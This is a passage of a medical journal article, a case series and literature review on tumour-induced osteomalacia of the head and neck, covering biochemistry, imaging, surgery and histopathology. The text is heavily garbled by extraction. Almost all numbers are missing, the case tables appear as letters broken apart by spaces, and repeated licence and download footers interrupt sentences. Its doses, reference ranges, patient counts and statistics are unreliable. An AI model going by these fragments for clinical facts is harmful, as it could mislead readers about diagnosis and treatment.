dysplasia of bone) were excluded from the study. diagnosis of tio was considered in patients presenting with features of hypophosphatemia in absence of relevant family history, evidence of renal phosphate wasting (as demonstrated by low % fractional tubular reabsorption of phosphate (trp) and tubular maximum for phosphate corrected for glomerular filtration rate (tmp/gfr)) with elevated fibroblast growth factor- (fgf- ). only those patients who had anatomical/functional imaging (ct/mri or ga-dotatate pet/ct) demonstrating localization of tumor in head and neck region have been included for analysis (n = ). biochemical parameters recorded pre-operatively include s. calcium, s. phosphorus, s. alkaline phosphatase (alp), tmp/gfr, trp and fgf levels, and post- operatively include s. phosphorus and fgf- levels. normal ranges for various parameters at our institute are as follows: s. calcium ( – . mg/dl), s. phosphorus ( . – mg/dl), s. alp (< u/l), tmp/gfr (age- and sex-adjusted values as recommended by chong et  al. ( )), trp (> %) and c-terminal fgf- ( – ru/ml). furthermore, details from imaging studies done for localization (ct or ga-dotatate pet/ct), treatment modality used, and histopathology reports have been included for analysis. for patients having recurrent disease additional information including time of recurrence following primary management, biochemical profile, localization of recurrent disease and secondary modality of treatment used was documented. tubular resorption of phosphate was measured from phosphate and creatinine levels in a spot fasting urine and serum samples at baseline before starting phosphate supplements. tmp/gfr was calculated with use of a nomogram reported by bijvoet et al. fgf was assessed by enzyme-linked immunosorbent assay (fgf (c-terminal) kit, immunotopics, inc, san clemente, ca, usa). the kit has sensitivity, an intra-assay coefficient of variation (cv), and an inter-assay cv of ru/ml, and . %, respectively. serum , (oh) vitamin d was assessed by radioimmunoassay (ria), using a dia source ria ct kit by dia source immunoassays, sa, with an intra-assay cv of . – . % (at . and . ng/l concentrations, respectively) and inter-assay cv of . – . % (at . and . ng/l concentrations, respectively). whole-body (head to toe) scanning with two acquisitions were obtained – . h post intravenous injection of – mbq of dotatate labeled with ga. ga was obtained from an in-house ge/ ga generator. scans were acquired on a ge discovery ste pet/ct with × matrix size and min per bed position of iterative algorithm time. the numbers of bed positions were dependent on the height of the patient, usually – per patient. ct scans were obtained on a -slice phillips brilliance ct scanner, while mri scans were performed on a . tesla siemens sonata (henkestrabe, germany) mr scanner. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review : cohort we searched for all original and review articles in pubmed till june (fig. ). individual search was carried out for terms ‘tumour-induced osteomalacia’, ‘oncogenic osteomalacia’, and ‘phosphaturic mesenchymal tumour’. all original and review articles published in english were reviewed for inclusion. only publications describing tio in head and neck region were included. a secondary search for relevant publications was carried out by handsearching through the reference lists of selected publications. hence, in addition to the cases described in our series, we reviewed index cases from publications of tio of head and neck region previously reported in literature. clinical profile, biochemical investigations, imaging modality used for localization, location of tumor, treatment modalities used, histopathology findings, recurrence and its management, and metastasis if any were noted. whenever serum levels of calcium, phosphorus, parathyroid hormone (pth), , (oh) vitamin d levels were available in si units, they were converted to conventional units with online calculators for uniformity in documentation. serum alp when available in units/liter only was included for analysis, while values reported in any other units were excluded due to non-availability of a suitable conversion method. statistical analysis statistical analysis was performed using spss software version . . mean (±standard deviation (s.d.)) was used for continuous variables when they were normally distributed and median (interquartile range (iqr)) was used for variables with skewed distribution. the difference between categorical variables was analyzed using chi- square test. p value < . is considered significant. results cohort this cohort includes seven index patients with tio involving head and neck region. their characteristics are described in table . the cohort comprised four males and three females with mean age of . ± . years whose tumors were located in paranasal sinuses (n = ), maxilla (n = ), and intra-cranially (n = ). all patients presented with bone pain and muscle weakness, while pathologic fractures (n = ) and local symptoms (n = ) were present in majority of patients. the time lag from onset of symptoms to diagnosis was lengthy (mean: . ± . months). in four patients, location of tumor was suspected at initial presentation based on clinical history and examination. thereafter, tumor location was confirmed with ga-dotanoc in two patients, with mri in one patient and ct in one patient. three patients were primarily detected on ga-dotanoc/dotatate pet/ct; one patient had a history of epistaxis elicited retrospectively after tumor localization. mean tumor size was . ± . cm. except for one patient (who was initially operated at another hospital), pre and post-operative serum phosphorus and fgf- levels were available in all patients (table ). three patients were cured with initial surgery, while four had persistent disease. no recurrence was documented in patients cured initially (n = ) over a mean follow-up of months. out of four patients with persistent disease, one patient was cured with repeat surgery only, two patients were cured with repeat surgery and external beam radiation therapy (ebrt), and one has stable disease after peptide receptor radionuclide therapy (prrt). histopathologic findings revealed phosphaturic mesenchymal tumor mixed connective tissue type (pmtmct) in four patients, while the remaining three patients had pmt-of (ossifying fibroma like), hemangiopericytoma, and odontogenic fibroma, respectively. clinical images of case numbers one, five and six are shown in figs , and respectively. addi�onal case records from bibliographic review of large case series (n= ) studies iden�fied from pubmed database (n= ) publica�ons included (n= ) studies excluded: (n= ) tio of other regions secondary tio pmt without osteomalacia non-english literature non relevant to tio duplica�ons/erratum ar�cles included for final analysis (n= ) figure  flowchart of search strategy and selection of studies for inclusion in systematic review. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review pb– : ta b le   d et ai ls o f co h o rt p at ie n ts . c as e n o. a ge /s ex lo ca ti on o f tu m or c li n ic al f ea tu re s im ag in g ch ar ac te ri st ic s s. p h os p h or u s (m g/ d l) fg f- (r u /m l) ( – ) lo ca l s ym p to m s fe at u re s o f ti o d u ra ti o n (m o n th s) lo ca liz at io n w it h si ze o f tu m o r (c m ) p re -o p p o st -o p p re -o p p o st -o p /f r ig h t m ax ill ar y al ve o lu s sw el lin g ov er ri gh t a lv eo lu s p , f h is to ry a n d p e . . . /m le ft p et ro u s tu m o r ea ra ch e, p ro tr u d in g m as s fr o m le ft e ar p , m w , f h is to ry a n d p e . . n a . /m le ft e th m o id si n u s ep is ta xi s p , m w , f g a- d o ta n o c . . . . /m r ig h t fr o n ta l & et h m o id s in u s n o p , m w g a- d o ta n o c . . . /f b as e o f th e sk u ll n o p , m w g a- d o ta ta te . . n a /f r ig h t m ax ill a r ig h t u pp er gu m s w el lin g p , m w , f h is to ry a n d p e . x . /m r ig h t n as al c av it y ep is ta xi s, n as al o b st ru ct io n p , m w h is to ry a n d p e . c as e n o. su rg ic al m an ag em en t pe rs is te n ce se co n d li n e m od al it y to ta l d u ra ti on o f fo ll ow -u p st at u s h is to p at h ol og y p ro ce d u re c o m p le te r es ec ti o n su rg er y r t p r r t in fr as tr u ct u re m ax ill ec to m y ye s – – – – c u re d o d o n to ge n ic fi b ro m a r et ro m as to id cr an io to m y w it h le ft p et ro se ct o m y n o ye s – ye s – c u re d h em an gi o p er ic yt o m a fe ss n o ye s fe ss t im es im r t g y in f ra ct io n s – c u re d p m tm c t fr o n ta l cr an io to m y an d ex ci si o n n o ye s en d o sc o p ic en d o n as al t u m o r ex ci si o n – – c u re d p m tm c t r et ro m as to id cr an io to m y w it h t u m o r ex ci si o n n o ye s ye s – ye s p er si st en ce p m tm c t r ig h t m ax ill ec to m y ye s n o – – – c u re d p m t o f lik e en d o sc o p ic en d o n as al tu m o r ex ci si o n ye s – – – – c u re d p m tm c t f, f ra ct u re s; f es s, f u n ct io n al e n d o sc o p ic s in u s su rg er y; im r t, in te n si ty -m o d u la te d r ad ia ti o n t h er ap y; m w , m u sc le w ea kn es s; n a , n o t av ai la b le ; o f, o ss ify in g fib ro m a lik e; p , p ai n ; p e, p h ys ic al ex am in at io n ; p m tm c t, p h o sp h at u ri c m es en ch ym al t u m o r m ix ed c o n n ec ti ve t is su e ty p e; p r r t, p ep ti d e re ce p to r ra d io n u cl id e th er ap y; r t, r ad ia ti o n t h er ap y. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review : cohort this cohort consists of index patients from publications. pertinent data relevant to index patients is provided in table . details of clinically relevant parameters are summarized in table . tests done using two different methods have been tabulated separately in table . due to heterogeneity in reporting of various parameters, the number of cases included (as denominator) have been specified for each parameter. the mean age was ± years with equal male:female ratio. the reported frequency of tumor sites, in descending order, are paranasal sinuses, mandible, intracranial, maxilla, oral cavity and others. approximately half the patients ( . %) had evident local symptoms. bone pain and muscle weakness were most commonly reported. late complications of hypophosphatemia such as fractures ( %) and bony deformities including kyphosis/scoliosis with resultant height loss ( . %) were seen in a significant number of patients. most patients were diagnosed late in their disease course, despite early access to health care, with median duration from symptom onset being almost years. out of patients, median elevation of fgf- up to . times uln has been reported in patients with the interquartile range (iqr) being . – . × uln. the primary treatment modality was surgery in most figure  (case ): a -year-old female presented with bone pains and multiple fractures for years. on examination, approximately  cm-sized round swelling in right upper alveolus was seen (a). preoperative chest radiograph (image contrast adjusted) showing looser’s zone along lateral border of scapula (arrows) suggestive of osteomalacia (b). axial contrast-enhanced ct image soft tissue window showing small enhancing lesion in right upper alveolus (arrow) extending from canine to st molar tooth causing erosion of right upper alveolus (c). ga-dotatate pet scan showing increased uptake at the level of right maxillary alveolus (arrow) (d). after excision histopathological examination showing tumor comprising of spindle cells with scattered osteoclastic giant cells bearing histologic semblance to giant cell granuloma (odontogenic fibroma) (e) (h&e, ×). figure  (case ): a -year-old female presenting with pain in bilateral groins and difficulty in walking for -year duration. as investigations confirmed the diagnosis of fgf- -dependent hypophosphatemic osteomalacia, ga-dotatate pet scan was done to locate the tumor which showed increased uptake in base of skull in left side (dashed arrows) (a). corresponding axial ct images (b) showing soft tissue density lesion involving occipital bone on left side with erosion of the mastoid and petrous part of adjacent temporal bone. retromastoid craniotomy with tumor excision was done. histopathological examination showed hypercellular tumor composed of prominent small blood vessels with areas of hemorrhage (h&e, ×) (d). post first surgery repeat ga-dotatate scan and corresponding ct images showing residual uptake in base of skull in left side (dashed arrows) in the soft tissue density lesion involving occipital bone on left side with erosion of the mastoid and petrous part of adjacent temporal bone (e). after failed second surgery, patient is now having stable disease after two cycles of prrt. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review pb– : patients ( . %). two patients with intracranial tumors, who declined surgery, were treated with primary ebrt. also, two patients received immediate post-operative ebrt for prevention of recurrence due to fear of incomplete tumor removal. out of patients for whom outcome data were available; patients had complete initial response to surgery, patients had persistent disease and patients had recurrence as defined by worsening of post-operatively documented normal biochemistry over a variable period of – months. patients with persistent/recurrent disease (n = ) were predominantly managed with surgery ( . %) and/or radiotherapy ( . %). among these patients were reported to be alive with no evidence of disease (aned) and remaining patients were managed with phosphorus supplements with/without other treatment modalities. four patients had metastatic disease with lymph node and/or lung metastasis. histopathologically, pmtmct ( . %) remains the most commonly reported tumor type followed by hemangiopericytoma ( . %), pmt of mixed epithelial and connective tissue type ( . %), giant cell tumor ( . %) and odontogenic fibroma ( . %). other rare types of tumor have been shown in table . discussion tio is a rare and underreported condition due to unawareness about the characteristic clinical and biochemical profile among treating clinicians. through this study, we aim to highlight our experience with tio cases involving head and neck region and provide a review of published literature analyzed on a per-patient basis. this will increase awareness and provide valuable insight on critical management issues for this rare diagnosis. cohort a significant time gap between initial presentation till diagnosis persists even in the presence of local symptoms ( ). for any atypical head and neck mass, clinician should enquire into history relevant to osteomalacia, and for a symptomatic patient appropriate biochemistry (s. calcium, s. phosphorus and alkaline phosphatase) should be requested. vice versa, in a patient with non- localized tio, a clinician should examine oral and nasal cavities for palpable swellings and enquire about relevant local symptoms. at our center we carry out a complete biochemical evaluation for tio which includes calcium studies (s. calcium, s. phosphorus, alp), tmp/gfr, , (oh) vitamin d and fgf- levels. fgf- serves as a diagnostic marker as well as an indicator of residual disease or recurrence during long-term follow-up. thereafter, functional imaging with ga-dotanoc pet/ct for localization is done. its superiority compared to fdg-pet/ct is well established ( , , ). functional imaging is followed by appropriate anatomic imaging to determine tumor extent and plan for surgical management. alternatively, in a tio patient presenting with local symptoms or a mass in head and neck region, anatomic imaging (ct/mri) followed by biopsy can also be used. figure  (case ): a -year-old female presenting with pain in bilateral groins, difficulty in walking and multiple fractures for -year duration. there was past history of dental surgery for some ‘gum swelling’. on examination, there was swelling in right upper alveolar region (a). x-ray right forearm ap view (image contrast adjusted) showing ulnar shaft fracture (b). mri hip showing bilateral femoral neck insufficiency fractures which was reported as ‘bilateral avascular necrosis’ (c). ga-dotanoc scan showing uptake in the right maxillary tumor (d). cect pns axial view showing  cm tumor in right maxillary region (e). patient was cured with right maxillectomy and osseous reconstruction. histopathology showed tumor composed of cellular connective tissue intermixed with woven bone displaying osteoblastic rimming (i.e. ossifying fibroma-like histology) (h&e, ×). this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review : ta b le   r ev ie w o f p u b lis h ed li te ra tu re o n h ea d a n d n ec k ti o c as es : l is t o f in d ex c as es w it h r el ev an t d at a. c as e n o. a u th or a ge /s ex lo ca ti on o f tu m or d u ra ti on o f sy m pt om s lo ca li zi n g im ag in g fg f- pe rs is te n ce / re cu rr en ce se co n d ar y m od al it y h pr p re -s u rg er y p o st -s u rg er y r en to n ( ) f le ft e th m o id x- ra y n a n a n a – h em an gi o p er ic yt o m a sw ee t ( ) f le ft m id d le tu rb in at e c t n a n a n o – h em an gi o p er ic yt o m a n it za n ( ) m le ft m an d ib u la r m o la r le gi o n x- ra y n a n a n o – g ia n t ce ll tu m o r n o m u ra ( ) m m an d ib le x- ra y n a n a p er si st en ce r t, c h em o th er ap y, n d s u rg er y, ch em o th er ap y p m t o ss ify in g fib ro m a lik e li n se y ( ) f r ig h t n as o p h ar yn x c t n a n a n a – p m tm c t sh en ke r ( ) m n ec k n a n a n a n a n o – p m tm c t sh es h ad ri ( ) f et h m o id s in u s n a c t n a n a n a – h em an gi o p er ic yt o m a je ff er ie s ( ) f le ft m ax ill ar y si n u s c t n a n a n a – p m t w ei d n er ( ) f r ig h t m ax ill ar y si n u s c t n a n a r ec u rr en ce r ep ea t su rg er y p ri m it iv e m es en ch ym al t u m o r p ap o tt i ( ) f n as al c av it y n a n a n a n a n o – p m tm c t h ar ve y ( ) f th yr o id p e n a n a p er si st en ce r ep ea t su rg er y: p ar ti al f /b t o ta l la ry n ge ct o m y f/ b r t an d c o n ti n u ed o n m ed ic al m an ag em en t m al ig n an t p m tm c t le e ( ) f le ft n as al c av it y c t n a n a n o – h em an gi o p er ic yt o m a c at al an o ( ) f r ig h t m ax ill ar y an d e th m o id al si n u s m an y ye ar s c t n a n a n o – h em an gi o p er ic yt o m a w ilk in s ( ) m le ft in fr at em p o ra l m as s c t n a n a n o – si n on as al h em an gi op er ic yt om a lik e d av id ( ) f r ig h t su b fr o n ta l m as s c t n a n a r ec u rr en ce m ed ic al m an ag em en t h em an gi o p er ic yt o m a k im ( ) m r ig h t u p p er p re m o la r p e n a n a n o – g ia n t ce ll tu m o r k im ( ) f le ft m an d ib u la r m o la r ar ea p e n a n a n o – o ss ify in g fib ro m a a vi la ( ) m m an d ib le m r i n a n a n o – c h ro n ic in fla m m at o ry ti ss u e w it h fi b ro si s an d e p it h el ia l r es ts ya n g ( ) f le ft m an d ib le c t n a n a n a – p m t- m c t g o n za le z- c o m p ta ( ) f r ig h t et h m o id o - fr o n ta l m as s c t n a n a p at ie n t d ie d o f tu m o r – p m t o h as h i ( ) m le ft m ax ill ar y si n u s c t n a n a n a – h em an gi o p er ic yt o m a c lu n ie ( ) f et h m o id s in u se s c t n a n a r ec u rr en ce m ed ic al m an ag em en t h em an gi o p er ic yt o m a sa n d h u ( ) m r ig h t et h m o id si n u s c t n a n a n o – h em an gi o p er ic yt o m a r ey es - m u gi ca ( ) f le ft m an d ib le . m r i n a n a n o – p m t- m c t (c on tin ue d) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review pb– : c as e n o. a u th or a ge /s ex lo ca ti on o f tu m or d u ra ti on o f sy m pt om s lo ca li zi n g im ag in g fg f- pe rs is te n ce / re cu rr en ce se co n d ar y m od al it y h pr p re -s u rg er y p o st -s u rg er y jo h n ( ) f r ig h t fr o n ta l, et h m o id al , sp h en o id si n u se s n a p e n a n a n a p at ie n t re ce iv ed im m ed ia te r t fo llo w in g su rg er y m al ig n an t sc h w an n o m a r ei s- fi lh o ( ) f c av er n o u s si n u s c t n a n a n o – p m tm c t fu en te al b a ( ) f m ax ill ar y si n u s c t n a n a p er si st en ce su rg er y, r t, em b o liz at io n h em an gi o p er ic yt o m a u n ga ri ( ) m et h m o id n a c t n a n a n a – h em an gi o p er ic yt o m a fo lp e ( ) m et h m o id / sp h en o id s in u s n a n a n a n o – h em an gi o p er ic yt o m a fo lp e ( ) m et h m o id s in u s n a n a n a r ec u rr en ce r ep ea t su rg er y h em an gi o p er ic yt o m a d u p o n d ( ) m lo w er m an d ib le fd g -p et   r u /m l (n < )  r u /m l (p o d ) n a – p m tm c t k ay lie ( ) f te m p o ra l b o n e c t n a n a n a – p m tm c t in o ku ch i ( ) f r ig h t n as al ca vi ty a n d p ar an as al si n u se s c t   r u /m l (n : – )  r u /m l (p o d ) n o – h em an gi o p er ic yt o m a yo sh io ka ( ) m c liv u s m r i n a  p g/ m l r ec u rr en ce a ft er fi rs t su rg er y re ce iv ed r t fo llo w ed b y m ed ic al m an ag em en t. o ct re o ti d e w as n o t eff ec ti ve . h em an gi o p er ic yt o m a k o ri ya m a ( ) f r ig h t m ax ill ar y si n u s c t   p g/ m l (n : – ) (  h p o st su rg er y) n o – p m tm c t el st o n ( ) f sk u ll o ct re o sc an  r u /m l (n : – )  r u /m l ( – ) (p o d ) n o – p m tm c t b ee ch ( ) m r ig h t et h m o id si n u s m r i n a n a n o – h em an gi o p er ic yt o m a a h n ( ) m le ft lo w er b u cc al ve st ib u le p e n a n a n o – h em an gi o p er ic yt o m a u ra m o to ( ) m to n gu e c t n a n a r ec u rr en ce se co n d s u rg er y, r t m al ig n an t p m tm c t le w ie ck i ( ) m m an d ib le o ct re o sc an   r u /m l (n < ) u d (p o d ) n o – p m t k en ea ly ( ) f le ft e th m o id si n u s n a c t   u /m l (n : – ) n a n a – p m tm c t k en ea ly ( ) f le ft e th m o id si n u s o ct re o sc an   u /m l (n : – ) n a n a – h em an gi o p er ic yt o m a k yo u n g- in yu n ( ) f m an d ib le p e n a n a n o – h em an gi o p er ic yt o m a w o o ( ) f m an d ib le p e   p g/ m l (n : – )  p g/ m l (p o d ) p er si st en ce p at ie n t o n o ra l p h o sp h at e so lu ti o n w it h c lo se f o llo w -u p la st f g f-   p g/ m l p m tm c t sa va ge ( ) f le ft m ax ill ar y si n u s i n -p en te tr eo ti d e n a n a n o – h em an gi o p er ic yt o m a ta b le   c o n ti n u ed this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review : k u ri en ( ) m r ig h t sp h en o id , et h m o id s in u s c t n a n a n o – h em an gi o p er ic yt o m a g u p ta ( ) m n as al c av it y fd g -p et n a n a n o – p m tm c t g o re ( ) f n as al c av it y o ct re o sc an   r u /m l (n < ) n o rm al (   m in p o st su rg er y) n o – p m tm c t k o b ay as h i ( ) f te m p o ra l b o n e sv s .   p g/ m l (n : – . ) n o rm al (p o d ) n o – p m tm c t sh el ek h o va ( ) f m ax ill ar y si n u s n a m r i n a n a n a – p m tm c t sh el ek h o va ( ) m fr o n ta l s in u s n a c t n a n a n a – p m tm c t p ed ra zz o li ( ) f r ig h t m ax ill ar y si n u s c t n a n a n o – h em an gi o p er ic yt o m a m o ri ( ) m le ft m ax ill ar y al ve o lu s m r i   p g/ m l (n : – ) n o rm al (  h p o st s u rg er y) n o – p m tm c t p ar sh w an at h ( ) f le ft n as al c av it y an d e th m o id si n u s c t n a n a n o – p m t b at to o ( ) f le ft n as al c av it y p e n a n a n a – g ia n t ce ll tu m o r p et er so n ( ) f m ax ill ar y si n u s n a n a n a n a n a – p m t p et er s ( ) m r ig h t te m p o ra l lo b e m as s p e n a n a p er si st en ce th re e cr an io to m ie s w it h an gi o em b o liz at io n , r t, p r r t, o ct re o ti d e, d as at in ib h em an gi o p er ic yt o m a a kh te r ( ) m c ve rt eb ra e n a fd g -p et n a n a n o – p m tm c t xi an -l in g ( ) f r ig h t p et ro u s ap ex m r i n a n a p er si st en ce o ct re o ti d e th er ap y p m tm c t xi an -l in g ( ) f le ft e th m o id si n u s o ct re o sc an n a n a n o – p m tm c t g u gl ie lm i ( ) m le ft e th m o id si n u s o ct re o sc an n a n a p er si st en ce r ep ea t su rg er y h em an gi o p er ic yt o m a u n o ( ) f r ig h t te m p o ra l b o n e c t > (n : –   p g/ m l) < (p o d - ) n a – p m t- m c t u n o ( ) m le ft b as i fr o n ta lis c t (n : –   p g/ m l) <  p g/ m l (im m ed ia te ly ) p er si st en ce r ep ea t su rg er y p m t- m c t a n d re u p o u lo u ( ) m le ft f ro n ta l l o b e n a sv s   p g/ m l   p g/ m l ( m o n th s p o st r t) a t m o n th s, p at ie n t h ad d ec lin in g fg f- – p m tm c t b er gw it z ( ) m m an d ib le p e   r u /m l ( n < ) n a p er si st en ce m u lt ip le s u rg er ie s, ci n ac al ce t a m el o b la st ic fib ro sa rc o m a m o n ap p a ( ) m r ig h t m an d ib le p e n a n a n o – p m tm c t c h o ky u ( ) m m id d le c ra n ia l fo ss a m r i  p g/ m l (n : – )  p g/ m l (p o d ) n o – p m t c h ia m ( ) m r ig h t n as al ca vi ty m r i   r u /m l (n < ) r u /m l (< ) d ay n o – p m tm c t c h o ( ) f n as al c av it y, et h m o id al si n u s c t n a n a n o – h em an gi op er ic yt om a (c on tin ue d) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review pb– : c as e n o. a u th or a ge /s ex lo ca ti on o f tu m or d u ra ti on o f sy m pt om s lo ca li zi n g im ag in g fg f- pe rs is te n ce / re cu rr en ce se co n d ar y m od al it y h pr p re -s u rg er y p o st -s u rg er y b ra n d w ei n - g en sl er ( ) f n as al c av it y, m ax ill a n a p e n a n a n o – g lo m an gi o p er ic yt o m a m u n o z ( ) m p o st er io r n ec k fd g -p et   r u /m l (n < ) n o rm al n o – p m tm c t c h an g ( ) m le ft n as al c av it y p e n a n a n o – h em an gi o p er ic yt o m a jia n g ( ) f m an d ib le o ct re o sc an n a n a n o – p m t- m c t jia n g ( ) f m an d ib le o ct re o sc an   p g/ m l (n : – ) n o – p m t- m c t jia n g ( ) m m an d ib le o ct re o sc an n a n a n o – o d o n to ge n ic fi b ro m a jia n g ( ) f m an d ib le o ct re o sc an n a n a n o – p m t- m c t jia n g ( ) f lo w er g in gi va o ct re o sc an n a n a n o – p m t- m c t jia n g ( ) f m an d ib le o ct re o sc an n a n a n o – o d o n to ge n ic fi b ro m a jia n g ( ) f m an d ib le o ct re o sc an n a n a n o – p m t- m c t jia n g ( ) m m ax ill a o ct re o sc an n a n a n o – o d o n to ge n ic fi b ro m a jia n g ( ) f n as al s in u s o ct re o sc an n a n a r ec u rr en ce o b se rv at io n p m t- m c t jia n g ( ) m n as al s in u s o ct re o sc an n a n a n o – p m t- m c t jia n g ( ) f n as al s in u s o ct re o sc an n a n a n o – p m t- m c t jia n g ( ) f n as al s in u s o ct re o sc an n a n a n o – p m t- m c t fa ta n i ( ) m fl o o r o f m o u th , m an d ib le c t n a n a r ec u rr en ce m u lt ip le s u rg er ie s, w ed ge lu n g re se ct io n m al ig n an t p m tm c t m at h is ( ) f c ri b ri fo rm p la te m r i n a n a n o – p m tm c t m at h is ( ) m a n te ri o r cr an ia l fo ss a, e th m o id si n u s c t n a n a p er si st en ce m u lt ip le s u rg er ie s p m tm c t ta ra so va ( ) f le ft f ro n ta l m as s sv s   p g/ m l (n : – )   r u /m l (n < ) ( ye ar s af te r r t) n o – n a p ap ie rs ka ( ) n a r ig h t m ax ill ar y si n u s n a o ct re o sc an .   r u /m l (n : - ) n a n a – g lo m an gi o p er ic yt o m a le e ( ) f r ig h t m ax ill ar y si n u s c t n a n a n o – g lo m an gi o p er ic yt o m a a lle vi ( ) f r ig h t m ax ill ar y si n u s o ct re o sc an n a n a n o – p m t h em an gi o p er ic yt o m a a n n am al ai ( ) m le ft n as al c av it y fd g -p et /d o ta .   r u /m l (n < ) .  r u /m l (p o d ) n o – p m tm c t o ka m iy a ( ) f le ft e th m o id si n u s fd g -p et   p g/ m l (n : – )  p g/ m l n o – p m tm c t a rn ao u ta ki s ( ) f r ig h t et h m o id si n u s p e n a n a n a – p m t m o k ( ) m r ig h t m ax ill ar y si n u s m r i n a n a n o – p m t fe rn án d ez - c o o ke ( ) m m ax ill a an d m an d ib le p e .   p g/ m l (n < ) .   r u /m l (n < ) n o rm al p er si st en ce r fa , l o ca l s te ro id in fil tr at io n , ca lc it o n in , b is p h o sp h o n at es , p ro p ra n o lo l, ci n ac al ce t c en tr al g ia n t ce ll gr an u lo m a fa th al la ( ) f r ig h t fr o n ta l lo b e o ct re o sc an   r u /m l (n : – ) n a n o – p m tm c t ta b le   c o n ti n u ed this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review : r ay ( ) m le ft n as al c av it y c t x n n a n o – h em an gi o p er ic yt o m a q ar i ( ) m g in gi va o f m an d ib u la r te et h p e n a n a n o – p m t w as se rm an ( ) m c ve rt eb ra e n a n a n a n o – p m tm c t w as se rm an ( ) f n o se , l ip s, to n gu e n a n a n a p er si st en ce n a m al ig n an t p m tm c t m an i ( ) m o cc ip it al b o n e p e n a n a n o – p m tm c t yu ( ) m m ax ill a p e .   p g/ m l (n : . – . ) .  p g/ m l n o – p m tm c t yu ( ) m m an d ib le p e .  p g/ m l (n : . – . ) n a n o – sp in d le c el l t u m o r w it h p m t fe at u re s yu ( ) m le ft n as al c av it y o ct re o sc an .  p g/ m l (n : . – . ) .  p g/ m l n o – p m tm c t yu ( ) f le ft n as al c av it y an d e th m o id si n u s o ct re o sc an .   p g/ m l (n : . – . ) n a n o – p m tm c t ta ka sh i ( ) m le ft p ar o ti d gl an d fd g -p et .   p g/ m l .   p g/ m l n o – p m tm c t g re sh am ( ) m et h m o id m as s m r i n a n a n o – g lo m an gi o m a a ga im y ( ) m n as al c av it y n a n a n a n a – c el lu la r, n o n d es cr ip t le e ( ) m r ig h t m an d ib le g a- d o ta n o c .  p g/ m l (n : – ) n a n o – g ia n t ce ll gr an u lo m a le e ( ) m le ft e th m o id si n u s g a- d o ta n o c .   p g/ m l (n : – ) n a p er si st en ce r t p m t sc h o b er ( ) f r ig h t fr o n to - b as al r eg io n sv s  r u /m l (n : – )  r u /m l r ec u rr en ce r ep ea t su rg er y m en in gi o m a zu o ( ) n a m le ft n as al c av it y o ct re o sc an n a n a n o – p m t zu o ( ) n a f le ft m ax ill ar y b o n e fd g -p et n a n a n o – p m t h an a ( ) m b ila te ra l et h m o id s in u s m r i   p g/ m l (n : – ) n d (p o d - ) p er si st en ce r ep ea t su rg er y p m tm c t c h an u ky a ( ) m le ft n as al c av it y g a- d o ta n o c  r u /m l (n : – )   r u /m l ( m o n th p o st su rg er y) n o – h em an gi o p er ic yt o m a g o n za le z ( ) m n as o fr o n ta l si n u s p e .  p g/ m l (n : – ) .   p g/ m l n o – p m tm c t si n gh ( ) m p o st er io r w al l o f m as to id an tr u m g a- d o ta n o c   r u /m l (n : – ) n a n a – p m t si n gh ( ) m le ft s id e o f b o d y o f m an d ib le g a- d o ta n o c  r u /m l (n : – ) n a n a – p m t p el le ti er ( ) m m an d ib le n a sv s f/ b m r i   r u / m l (n : – ) n a n a – n a p el le ti er ( ) f m an d ib le o ct re o sc an o f gr o w in g le si o n o n m r i w it h fd g -a vi d it y an d gr ad ie n t o n s v s  r u /m l (n : – )   r u /m l p er si st en ce n a n a (c on tin ue d) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm 